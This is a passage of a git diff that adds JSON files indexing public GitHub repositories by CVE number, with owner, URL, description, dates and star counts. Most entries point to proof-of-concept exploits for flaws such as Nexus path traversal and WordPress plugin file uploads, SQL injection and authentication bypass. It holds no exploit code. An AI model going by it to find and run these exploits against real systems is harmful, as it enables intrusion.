"watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 806592885, + "name": "CVE-2024-4956", + "full_name": "yagyuufellinluvv\/CVE-2024-4956", + "owner": { + "login": "yagyuufellinluvv", + "id": 170684196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170684196?v=4", + "html_url": "https:\/\/github.com\/yagyuufellinluvv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yagyuufellinluvv\/CVE-2024-4956", + "description": null, + "fork": false, + "created_at": "2024-05-27T13:48:15Z", + "updated_at": "2024-05-27T13:48:15Z", + "pushed_at": "2024-05-27T13:48:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 807147595, + "name": "CVE-2024-4956", + "full_name": "GoatSecurity\/CVE-2024-4956", + "owner": { + "login": "GoatSecurity", + "id": 153397256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153397256?v=4", + "html_url": "https:\/\/github.com\/GoatSecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GoatSecurity\/CVE-2024-4956", + "description": "CVE-2024-4956 : Nexus Repository Manager 3 poc exploit", + "fork": false, + "created_at": "2024-05-28T15:05:31Z", + "updated_at": "2024-11-20T16:30:48Z", + "pushed_at": "2024-05-29T11:54:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 807309759, + "name": "CVE-2024-4956", + "full_name": "TypicalModMaker\/CVE-2024-4956", + "owner": { + "login": "TypicalModMaker", + "id": 52781429, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52781429?v=4", + "html_url": "https:\/\/github.com\/TypicalModMaker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TypicalModMaker\/CVE-2024-4956", + "description": "Proof-Of-Concept (POC) for CVE-2024-4956", + "fork": false, + "created_at": "2024-05-28T21:20:53Z", + "updated_at": "2024-11-20T16:30:48Z", + "pushed_at": "2024-05-29T07:37:15Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-4956", + "exploit", + "poc", + "proof-of-concept", + "proofofconcept", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 808014744, + "name": "CVE-2024-4956-Sonatype-Nexus-Repository-Manager", + "full_name": "Praison001\/CVE-2024-4956-Sonatype-Nexus-Repository-Manager", + "owner": { + "login": "Praison001", + "id": 60835238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4", + "html_url": "https:\/\/github.com\/Praison001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-4956-Sonatype-Nexus-Repository-Manager", + "description": "Exploit for CVE-2024-4956 affecting all previous Sonatype Nexus Repository 3.x OSS\/Pro versions up to and including 3.68.0", + "fork": false, + "created_at": "2024-05-30T08:04:27Z", + "updated_at": "2024-06-01T11:11:39Z", + "pushed_at": "2024-06-01T11:11:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809568326, + "name": "CVE-2024-4956", + "full_name": "Cappricio-Securities\/CVE-2024-4956", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-4956", + "description": "Sonatype Nexus Repository Manager 3 (LFI)", + "fork": false, + "created_at": "2024-06-03T02:49:20Z", + "updated_at": "2024-08-27T14:29:47Z", + "pushed_at": "2024-06-24T10:14:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "bugbounty-tool", + "bugbounty-tools", + "cve-2024-4956", + "cve-2024-4956-exploit", + "cve-2024-4956-poc", + "cve-2024-4956-scanner", + "lfi", + "lfi-detection", + "lfi-exploit", + "lfi-exploitation", + "lfi-exploiter", + "lfi-scanner", + "local-file-inclusion", + "sonatype-nexus-repository-manager-3" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 810916474, + "name": "CVE-2024-4956", + "full_name": "fin3ss3g0d\/CVE-2024-4956", + "owner": { + "login": "fin3ss3g0d", + "id": 62859381, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62859381?v=4", + "html_url": "https:\/\/github.com\/fin3ss3g0d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fin3ss3g0d\/CVE-2024-4956", + "description": "CVE-2024-4956 Python exploitation utility", + "fork": false, + "created_at": "2024-06-05T15:37:39Z", + "updated_at": "2024-11-14T20:00:24Z", + "pushed_at": "2024-11-14T20:00:20Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812597751, + "name": "CVE-2024-4956", + "full_name": "verylazytech\/CVE-2024-4956", + "owner": { + "login": "verylazytech", + "id": 172168670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168670?v=4", + "html_url": "https:\/\/github.com\/verylazytech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/verylazytech\/CVE-2024-4956", + "description": "POC - CVE-2024–4956 - Nexus Repository Manager 3 Unauthenticated Path Traversal", + "fork": false, + "created_at": "2024-06-09T10:57:29Z", + "updated_at": "2024-11-26T21:34:44Z", + "pushed_at": "2024-11-26T14:46:24Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-4956-poc", + "nexus-repository-manager", + "unauthenticated-path-traversal" + ], + "visibility": "public", + "forks": 5, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 842584436, + "name": "CVE-2024-4956", + "full_name": "JolyIrsb\/CVE-2024-4956", + "owner": { + "login": "JolyIrsb", + "id": 48220535, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48220535?v=4", + "html_url": "https:\/\/github.com\/JolyIrsb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JolyIrsb\/CVE-2024-4956", + "description": null, + "fork": false, + "created_at": "2024-08-14T16:41:01Z", + "updated_at": "2024-08-29T13:31:15Z", + "pushed_at": "2024-08-14T17:44:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 863594626, + "name": "Path-Traversal-CVE-2024-4956", + "full_name": "UMASANKAR-MG\/Path-Traversal-CVE-2024-4956", + "owner": { + "login": "UMASANKAR-MG", + "id": 149225998, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149225998?v=4", + "html_url": "https:\/\/github.com\/UMASANKAR-MG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UMASANKAR-MG\/Path-Traversal-CVE-2024-4956", + "description": null, + "fork": false, + "created_at": "2024-09-26T15:05:41Z", + "updated_at": "2024-09-26T15:49:18Z", + "pushed_at": "2024-09-26T15:46:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 867826963, + "name": "shirocrack", + "full_name": "An00bRektn\/shirocrack", + "owner": { + "login": "An00bRektn", + "id": 58986498, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58986498?v=4", + "html_url": "https:\/\/github.com\/An00bRektn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/An00bRektn\/shirocrack", + "description": "Simple hash cracker for Apache Shiro hashes written in Golang. Useful for exploiting CVE-2024-4956.", + "fork": false, + "created_at": "2024-10-04T19:54:05Z", + "updated_at": "2024-10-06T16:27:05Z", + "pushed_at": "2024-10-04T20:38:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-49681.json b/2024/CVE-2024-49681.json new file mode 100644 index 0000000000..1ef90c9de3 --- /dev/null +++ b/2024/CVE-2024-49681.json @@ -0,0 +1,33 @@ +[ + { + "id": 885857761, + "name": "CVE-2024-49681", + "full_name": "RandomRobbieBF\/CVE-2024-49681", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-49681", + "description": "WP Sessions Time Monitoring Full Automatic <= 1.0.9 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-11-09T15:24:16Z", + "updated_at": "2024-11-14T10:40:35Z", + "pushed_at": "2024-11-09T15:25:29Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5009.json b/2024/CVE-2024-5009.json new file mode 100644 index 0000000000..676a0216bc --- /dev/null +++ b/2024/CVE-2024-5009.json @@ -0,0 +1,64 @@ +[ + { + "id": 825745964, + "name": "CVE-2024-5009", + "full_name": "sinsinology\/CVE-2024-5009", + "owner": { + "login": "sinsinology", + "id": 77316200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4", + "html_url": "https:\/\/github.com\/sinsinology", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sinsinology\/CVE-2024-5009", + "description": "Exploit for CVE-2024-5009", + "fork": false, + "created_at": "2024-07-08T12:15:29Z", + "updated_at": "2024-11-20T16:30:55Z", + "pushed_at": "2024-07-08T12:15:41Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 826412875, + "name": "CVE-2024-5009", + "full_name": "th3gokul\/CVE-2024-5009", + "owner": { + "login": "th3gokul", + "id": 89386101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89386101?v=4", + "html_url": "https:\/\/github.com\/th3gokul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th3gokul\/CVE-2024-5009", + "description": "CVE-2024-5009 : WhatsUp Gold SetAdminPassword Privilege Escalation", + "fork": false, + "created_at": "2024-07-09T16:56:49Z", + "updated_at": "2024-08-07T04:26:04Z", + "pushed_at": "2024-07-09T17:14:52Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50251.json b/2024/CVE-2024-50251.json new file mode 100644 index 0000000000..241b5c63c9 --- /dev/null +++ b/2024/CVE-2024-50251.json @@ -0,0 +1,33 @@ +[ + { + "id": 887128999, + "name": "CVE-2024-50251-PoC", + "full_name": "slavin-ayu\/CVE-2024-50251-PoC", + "owner": { + "login": "slavin-ayu", + "id": 88360575, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88360575?v=4", + "html_url": "https:\/\/github.com\/slavin-ayu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/slavin-ayu\/CVE-2024-50251-PoC", + "description": "Just a local Dos bug in Linux kernel", + "fork": false, + "created_at": "2024-11-12T08:08:55Z", + "updated_at": "2024-11-15T07:06:25Z", + "pushed_at": "2024-11-12T08:14:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50335.json b/2024/CVE-2024-50335.json new file mode 100644 index 0000000000..72c30a7f1d --- /dev/null +++ b/2024/CVE-2024-50335.json @@ -0,0 +1,33 @@ +[ + { + "id": 884650375, + "name": "CVE-2024-50335", + "full_name": "shellkraft\/CVE-2024-50335", + "owner": { + "login": "shellkraft", + "id": 89618500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89618500?v=4", + "html_url": "https:\/\/github.com\/shellkraft", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shellkraft\/CVE-2024-50335", + "description": null, + "fork": false, + "created_at": "2024-11-07T06:19:49Z", + "updated_at": "2024-11-10T11:15:21Z", + "pushed_at": "2024-11-07T06:51:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50340.json b/2024/CVE-2024-50340.json new file mode 100644 index 0000000000..0dac0f319e --- /dev/null +++ b/2024/CVE-2024-50340.json @@ -0,0 +1,33 @@ +[ + { + "id": 884497011, + "name": "CVE-2024-50340", + "full_name": "Nyamort\/CVE-2024-50340", + "owner": { + "login": "Nyamort", + "id": 67233336, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67233336?v=4", + "html_url": "https:\/\/github.com\/Nyamort", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nyamort\/CVE-2024-50340", + "description": null, + "fork": false, + "created_at": "2024-11-06T21:24:43Z", + "updated_at": "2024-11-25T06:51:13Z", + "pushed_at": "2024-11-08T16:39:57Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50395.json b/2024/CVE-2024-50395.json new file mode 100644 index 0000000000..ddf66493c2 --- /dev/null +++ b/2024/CVE-2024-50395.json @@ -0,0 +1,33 @@ +[ + { + "id": 893743289, + "name": "CVE-2024-50395", + "full_name": "neko-hat\/CVE-2024-50395", + "owner": { + "login": "neko-hat", + "id": 29542700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29542700?v=4", + "html_url": "https:\/\/github.com\/neko-hat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/neko-hat\/CVE-2024-50395", + "description": null, + "fork": false, + "created_at": "2024-11-25T06:06:25Z", + "updated_at": "2024-11-25T22:48:49Z", + "pushed_at": "2024-11-25T06:11:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50427.json b/2024/CVE-2024-50427.json new file mode 100644 index 0000000000..3532f8b177 --- /dev/null +++ b/2024/CVE-2024-50427.json @@ -0,0 +1,33 @@ +[ + { + "id": 885351535, + "name": "CVE-2024-50427", + "full_name": "RandomRobbieBF\/CVE-2024-50427", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50427", + "description": "SurveyJS: Drag & Drop WordPress Form Builder <= 1.9.136 - Authenticated (Subscriber+) Arbitrary File Upload", + "fork": false, + "created_at": "2024-11-08T12:24:06Z", + "updated_at": "2024-11-08T12:26:15Z", + "pushed_at": "2024-11-08T12:26:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50450.json b/2024/CVE-2024-50450.json new file mode 100644 index 0000000000..4dce11c89f --- /dev/null +++ b/2024/CVE-2024-50450.json @@ -0,0 +1,33 @@ +[ + { + "id": 885327071, + "name": "CVE-2024-50450", + "full_name": "RandomRobbieBF\/CVE-2024-50450", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50450", + "description": "WordPress Meta Data and Taxonomies Filter (MDTF) <= 1.3.3.4 - Unauthenticated Arbitrary Shortcode Execution", + "fork": false, + "created_at": "2024-11-08T11:24:16Z", + "updated_at": "2024-11-15T13:26:04Z", + "pushed_at": "2024-11-08T11:25:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50473.json b/2024/CVE-2024-50473.json new file mode 100644 index 0000000000..7635dd5611 --- /dev/null +++ b/2024/CVE-2024-50473.json @@ -0,0 +1,33 @@ +[ + { + "id": 885717449, + "name": "CVE-2024-50473", + "full_name": "RandomRobbieBF\/CVE-2024-50473", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50473", + "description": "Ajar in5 Embed <= 3.1.3 - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2024-11-09T07:46:54Z", + "updated_at": "2024-11-09T07:49:13Z", + "pushed_at": "2024-11-09T07:49:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50475.json b/2024/CVE-2024-50475.json new file mode 100644 index 0000000000..2e087bc9ef --- /dev/null +++ b/2024/CVE-2024-50475.json @@ -0,0 +1,33 @@ +[ + { + "id": 883081341, + "name": "CVE-2024-50475", + "full_name": "RandomRobbieBF\/CVE-2024-50475", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50475", + "description": "Signup Page <= 1.0 - Unauthenticated Arbitrary Options Update", + "fork": false, + "created_at": "2024-11-04T10:46:46Z", + "updated_at": "2024-11-04T10:51:54Z", + "pushed_at": "2024-11-04T10:51:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50476.json b/2024/CVE-2024-50476.json new file mode 100644 index 0000000000..54dbf744d6 --- /dev/null +++ b/2024/CVE-2024-50476.json @@ -0,0 +1,33 @@ +[ + { + "id": 883044063, + "name": "CVE-2024-50476", + "full_name": "RandomRobbieBF\/CVE-2024-50476", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50476", + "description": "GRÜN spendino Spendenformular <= 1.0.1 - Unauthenticated Arbitrary Options Update", + "fork": false, + "created_at": "2024-11-04T09:30:36Z", + "updated_at": "2024-11-04T09:32:19Z", + "pushed_at": "2024-11-04T09:32:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50477.json b/2024/CVE-2024-50477.json new file mode 100644 index 0000000000..a2916dd72d --- /dev/null +++ b/2024/CVE-2024-50477.json @@ -0,0 +1,33 @@ +[ + { + "id": 885488327, + "name": "CVE-2024-50477", + "full_name": "RandomRobbieBF\/CVE-2024-50477", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50477", + "description": "Stacks Mobile App Builder <= 5.2.3 - Authentication Bypass via Account Takeover", + "fork": false, + "created_at": "2024-11-08T17:22:29Z", + "updated_at": "2024-11-08T17:24:37Z", + "pushed_at": "2024-11-08T17:24:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50478.json b/2024/CVE-2024-50478.json new file mode 100644 index 0000000000..f064a62441 --- /dev/null +++ b/2024/CVE-2024-50478.json @@ -0,0 +1,33 @@ +[ + { + "id": 883959177, + "name": "CVE-2024-50478", + "full_name": "RandomRobbieBF\/CVE-2024-50478", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50478", + "description": "1-Click Login: Passwordless Authentication 1.4.5 - Authentication Bypass via Account Takeover", + "fork": false, + "created_at": "2024-11-05T22:04:55Z", + "updated_at": "2024-11-05T22:06:29Z", + "pushed_at": "2024-11-05T22:06:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50482.json b/2024/CVE-2024-50482.json new file mode 100644 index 0000000000..414cffdb0e --- /dev/null +++ b/2024/CVE-2024-50482.json @@ -0,0 +1,33 @@ +[ + { + "id": 883725552, + "name": "CVE-2024-50482", + "full_name": "RandomRobbieBF\/CVE-2024-50482", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50482", + "description": "Woocommerce Product Design <= 1.0.0 - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2024-11-05T13:19:05Z", + "updated_at": "2024-11-05T13:21:18Z", + "pushed_at": "2024-11-05T13:21:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50483.json b/2024/CVE-2024-50483.json new file mode 100644 index 0000000000..4330bb40e1 --- /dev/null +++ b/2024/CVE-2024-50483.json @@ -0,0 +1,33 @@ +[ + { + "id": 883950955, + "name": "CVE-2024-50483", + "full_name": "RandomRobbieBF\/CVE-2024-50483", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50483", + "description": "Meetup <= 0.1 - Authentication Bypass via Account Takeover", + "fork": false, + "created_at": "2024-11-05T21:38:44Z", + "updated_at": "2024-11-14T10:41:37Z", + "pushed_at": "2024-11-05T21:40:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50485.json b/2024/CVE-2024-50485.json new file mode 100644 index 0000000000..7dac23dd75 --- /dev/null +++ b/2024/CVE-2024-50485.json @@ -0,0 +1,33 @@ +[ + { + "id": 883716846, + "name": "CVE-2024-50485", + "full_name": "RandomRobbieBF\/CVE-2024-50485", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50485", + "description": "Exam Matrix <= 1.5 - Unauthenticated Privilege Escalation", + "fork": false, + "created_at": "2024-11-05T13:02:28Z", + "updated_at": "2024-11-05T13:03:53Z", + "pushed_at": "2024-11-05T13:03:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50488.json b/2024/CVE-2024-50488.json new file mode 100644 index 0000000000..1ca20ef666 --- /dev/null +++ b/2024/CVE-2024-50488.json @@ -0,0 +1,33 @@ +[ + { + "id": 885769222, + "name": "CVE-2024-50488", + "full_name": "RandomRobbieBF\/CVE-2024-50488", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50488", + "description": "Token Login <= 1.0.3 - Authenticated (Subscriber+) Privilege Escalation", + "fork": false, + "created_at": "2024-11-09T10:54:06Z", + "updated_at": "2024-11-09T10:58:33Z", + "pushed_at": "2024-11-09T10:56:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50490.json b/2024/CVE-2024-50490.json new file mode 100644 index 0000000000..f74719f557 --- /dev/null +++ b/2024/CVE-2024-50490.json @@ -0,0 +1,33 @@ +[ + { + "id": 883699871, + "name": "CVE-2024-50490", + "full_name": "RandomRobbieBF\/CVE-2024-50490", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-50490", + "description": "PegaPoll <= 1.0.2 - Unauthenticated Arbitrary Options Update", + 